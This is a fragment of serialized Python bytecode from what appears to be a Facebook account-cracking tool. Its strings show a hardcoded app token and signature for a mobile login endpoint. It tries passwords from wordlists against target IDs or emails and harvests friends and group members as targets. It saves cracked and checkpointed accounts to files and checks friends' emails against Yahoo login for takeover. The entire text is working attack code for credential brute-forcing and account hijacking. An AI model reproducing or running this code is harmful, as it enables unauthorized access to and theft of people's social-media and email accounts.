\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0c\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01n\x00\x01|\x03\x00d\x17\x00\x19d\x05\x00\x17}\r\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\r\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x04t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\r\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01nV\x00d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x05t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\r\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x18\x00\x00\x00NR\x90\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0f\x00\x00\x00/?access_token=R\xb2\x00\x00\x00R\xb7\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x1e\x00\x00\x00\x1b[1;97m[ \x1b[1;92mDone\x1b[1;97m ] R\xd4\x00\x00\x00s\x03\x00\x00\x00 =>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x10\x00\x00\x00out/super_cp.txtRm\x00\x00\x00s\x01\x00\x00\x00\nR\xb5\x00\x00\x00R\xb3\x00\x00\x00t\x07\x00\x00\x00gantengR\xb6\x00\x00\x00(\x12\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00t\x03\x00\x00\x00oksR\x94\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R\xdb\x00\x00\x00(\x0e\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userRm\x00\x00\x00R\xe1\x00\x00\x00t\x05\x00\x00\x00pass1Rl\x00\x00\x00R~\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00t\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00main;\x05\x00\x00s\x96\x00\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x02\x1b\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal OK/CP \x1b[1;91m: \x1b[1;92ms\x0f\x00\x00\x00\x1b[1;97m/\x1b[1;93ms@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCP File saved \x1b[1;91m: \x1b[1;97mout/super_cp.txt(\x1c\x00\x00\x00R/\x00\x00\x00R\xe3\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00Rj\x00\x00\x00R\x94\x00\x00\x00R,\x00\x00\x00R\xae\x00\x00\x00Rv\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00mapR\xe5\x00\x00\x00R\xdb\x00\x00\x00(\x0f\x00\x00\x00t\x04\x00\x00\x00peakR\'\x00\x00\x00R\x1e\x00\x00\x00R\xa2\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x13\x00\x00\x00t\x03\x00\x00\x00idgR\xa0\x00\x00\x00R\xa1\x00\x00\x00t\x01\x00\x00\x00pR!\x00\x00\x00R"\x00\x00\x00R\xed\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xe3\x00\x00\x00\xfc\x04\x00\x00s\x88\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\r\x01\x05\x01\n\x01\x13\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x11\x01\x18\x01\x0c\x01\n\x02\x05\x01\x07\x02\x15\x01\n\x01\x0f\x01\r\x01\x08\x00\r\x00\x11\x01\x01\x01\t\x04\t]\x0c\x01\x10\x01\t\x01\x05\x01)\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x8f\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHy\xf9\x01t\n\x00d\x07\x00\x83\x01\x00}\x00\x00t\n\x00d\x08\x00\x83\x01\x00}\x01\x00t\x02\x00|\x01\x00d\x03\x00\x83\x02\x00}\x02\x00|\x02\x00j\x0b\x00\x83\x00\x00}\x02\x00d\t\x00d\n\x00\x14GHd\x0b\x00|\x00\x00\x17GHd\x0c\x00t\x0c\x00t\r\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\r\x00\x17GHt\x0e\x00d\x0e\x00\x83\x01\x00\x01t\x02\x00|\x01\x00d\x03\x00\x83\x02\x00}\x03\x00x{\x01|\x03\x00D]s\x01}\x04\x00yA\x01|\x04\x00j\x0f\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x04\x00t\x10\x00j\x11\x00j\x12\x00d\x11\x00|\x04\x00\x17\x83\x01\x00\x01t\x10\x00j\x11\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x12\x00|\x00\x00\x17d\x13\x00\x17|\x04\x00\x17d\x14\x00\x17\x83\x01\x00}\x05\x00t\x16\x00j\x17\x00|\x05\x00j\x18\x00\x83\x01\x00}\x06\x00d\x15\x00|\x06\x00k\x06\x00r\xc8\x01t\x02\x00d\x16\x00d\x17\x00\x83\x02\x00}\x07\x00|\x07\x00j\x12\x00|\x00\x00d\x18\x00\x17|\x04\x00\x17d\x0f\x00\x17\x83\x01\x00\x01|\x07\x00j\x19\x00\x83\x00\x00\x01d\x19\x00GHd\t\x00d\n\x00\x14GHd\x1a\x00|\x00\x00\x17GHd\x1b\x00|\x04\x00\x17GHt\x1a\x00\x83\x00\x00\x01nq\x00d\x1c\x00|\x06\x00d\x1d\x00\x19k\x06\x00r9\x02t\x02\x00d\x1e\x00d\x17\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x00\x00d\x18\x00\x17|\x04\x00\x17d\x0f\x00\x17\x83\x01\x00\x01|\x08\x00j\x19\x00\x83\x00\x00\x01d\x19\x00GHd\t\x00d\n\x00\x14GHd\x1f\x00GHd\x1a\x00|\x00\x00\x17GHd\x1b\x00|\x04\x00\x17GHt\x1a\x00\x83\x00\x00\x01n\x00\x00Wq\xf3\x00\x04t\x14\x00j\x1b\x00j\x1c\x00k\n\x00re\x02\x01\x01\x01d \x00GHt\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01q\xf3\x00Xq\xf3\x00WWn\x1d\x00\x04t\x05\x00k\n\x00r\x8a\x02\x01\x01\x01d!\x00GHt\x1d\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S("\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sX\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m s@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97mi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s9\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m s\x1f\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m s\x10\x00\x00\x00 \x1b[1;92mPasswords$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x01\x00\x00\x00\nR\n\x00\x00\x00s9\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m: \x1b[1;97ms\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\t\x00\x00\x00Brute.txtR\x11\x00\x00\x00s\x03\x00\x00\x00 | s\x18\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mFounds-\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m s-\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x11\x00\x00\x00Brutecekpoint.txts$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x1b\x00\x00\x00\x1b[1;91m[!] Connection Errors\x19\x00\x00\x00\x1b[1;91m[!] File not found(\x1e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\t\x00\x00\x00readlinesR\x17\x00\x00\x00R\x0e\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x19\x00\x00\x00R\x1b\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x08\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00t\x06\x00\x00\x00tanyaw(\t\x00\x00\x00R?\x00\x00\x00R\xcb\x00\x00\x00t\x05\x00\x00\x00totalt\x05\x00\x00\x00sandit\x02\x00\x00\x00pwRl\x00\x00\x00R\xdf\x00\x00\x00t\x05\x00\x00\x00dapatt\x04\x00\x00\x00ceks(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaf\x00\x00\x00\xa3\x05\x00\x00sh\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x03\x01\x0c\x01\x0c\x01\x0f\x01\x0c\x01\t\x01\t\x01\x19\x01\n\x01\x0f\x01\r\x01\x03\x01\x12\x01\x14\x01\r\x01\x1f\x01\x12\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x05\x01\t\x01\t\x01\t\x01\n\x01\x10\x01\x0f\x01\x19\x01\n\x01\x05\x01\t\x01\x05\x01\t\x01\t\x01\x0e\x01\x13\x01\x05\x01\x19\x01\r\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x8f\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x02\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x03\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x08\x00\x00\x00Ns@\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate wordlist ? \x1b[1;92m[y/n]\x1b[1;91m:\x1b[1;97m R\n\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] WrongRo\x00\x00\x00t\x01\x00\x00\x00YR\xa8\x00\x00\x00t\x01\x00\x00\x00N(\x04\x00\x00\x00R/\x00\x00\x00R\xf3\x00\x00\x00t\x08\x00\x00\x00wordlistRv\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00why(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xf3\x00\x00\x00\xd9\x05\x00\x00s\x1c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x9b\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\r\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m With list friends7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Clone from friends=\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Clone from member groups0\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Using files*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00yahoo_pilih(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xb0\x00\x00\x00\xec\x05\x00\x00s"\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\t\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] WrongR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R:\x00\x00\x00(\x07\x00\x00\x00R/\x00\x00\x00R\xfd\x00\x00\x00t\x0c\x00\x00\x00yahoofriendst\x10\x00\x00\x00yahoofromfriendst\x0b\x00\x00\x00yahoomembert\t\x00\x00\x00yahoolistRv\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00go(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfd\x00\x00\x00\x00\x06\x00\x00s \x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb5\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\n\x00t\x04\x00\x17\x83\x01\x00}\x02\x00t\x0f\x00j\x10\x00|\x02\x00j\x11\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x04\x00t\x0c\x00d\r\x00\x83\x01\x00\x01d\x0e\x00d\x0f\x00\x14GHxw\x01|\x03\x00d\x10\x00\x19D]k\x01}\x05\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x12\x00|\x01\x00\x83\x01\x00\x01|\x05\x00d\x11\x00\x19}\x06\x00|\x05\x00d\x12\x00\x19}\x07\x00t\r\x00j\x0e\x00d\x13\x00|\x06\x00\x17d\x14\x00\x17t\x04\x00\x17\x83\x01\x00}\x08\x00t\x0f\x00j\x10\x00|\x08\x00j\x11\x00\x83\x01\x00}\t\x00y\xf9\x00|\t\x00d\x15\x00\x19}\n\x00t\x13\x00j\x14\x00d\x16\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00\x83\x01\x00j\x16\x00\x83\x00\x00}\x0c\x00d\x17\x00|\x0c\x00k\x06\x00rU\x02t\x17\x00j\x02\x00d\x18\x00\x83\x01\x00\x01t\x18\x00t\x17\x00j\x19\x00_\x1a\x00t\x17\x00j\x1b\x00d\x19\x00d\x08\x00\x83\x00\x01\x01|\n\x00t\x17\x00d\x1a\x00<t\x17\x00j\x1c\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\r\x00t\x13\x00j\x14\x00d\x1b\x00\x83\x01\x00}\x0e\x00y\x19\x00|\x0e\x00j\x15\x00|\r\x00\x83\x01\x00j\x16\x00\x83\x00\x00}\x0f\x00Wn\n\x00\x01\x01\x01w\xff\x00n\x01\x00Xd\x1c\x00|\x0f\x00k\x06\x00rU\x02|\x04\x00j\x1d\x00|\n\x00d\x1d\x00\x17\x83\x01\x00\x01d\x1e\x00|\n\x00\x17d\x1f\x00\x17|\x07\x00\x17GHt\x1e\x00j\x12\x00|\n\x00\x83\x01\x00\x01qU\x02n\x00\x00Wq\xff\x00\x04t\x1f\x00k\n\x00ri\x02\x01\x01\x01q\xff\x00Xq\xff\x00Wd\x0e\x00d\x0f\x00\x14GHd \x00GHd!\x00t \x00t!\x00t\x1e\x00\x83\x01\x00\x83\x01\x00\x17GHd"\x00GH|\x04\x00j"\x00\x83\x00\x00\x01t#\x00d#\x00\x83\x01\x00\x01t$\x00\x83\x00\x00\x01d\x00\x00S($\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s3\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email friend \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x10\x00\x00\x00out/MailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00R0\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97ms=\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/MailVuln.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m](%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00t\x07\x00\x00\x00compilet\x06\x00\x00\x00searcht\x05\x00\x00\x00groupRT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R,\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\xb0\x00\x00\x00(\x10\x00\x00\x00R\xdf\x00\x00\x00t\x03\x00\x00\x00jmlt\x05\x00\x00\x00temant\x05\x00\x00\x00kimakt\x04\x00\x00\x00saveR\x11\x00\x00\x00Rj\x00\x00\x00Rq\x00\x00\x00t\x05\x00\x00\x00linksR\x1e\x00\x00\x00t\x04\x00\x00\x00mailt\x05\x00\x00\x00yahooRp\x00\x00\x00t\x04\x00\x00\x00klikR\x9d\x00\x00\x00t\x03\x00\x00\x00pek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfe\x00\x00\x00\x14\x06\x00\x00sr\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\n\x01\x13\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x12\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s1\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00}\x02\x00y>\x00t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x03\x00t\x0f\x00j\x10\x00|\x03\x00j\x11\x00\x83\x01\x00}\x04\x00d\x0c\x00|\x04\x00d\r\x00\x19\x17GHWn\'\x00\x04t\x12\x00k\n\x00r\x16\x01\x01\x01\x01d\x0e\x00GHt\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xt\x14\x00d\x10\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x11\x00\x17t\x04\x00\x17\x83\x0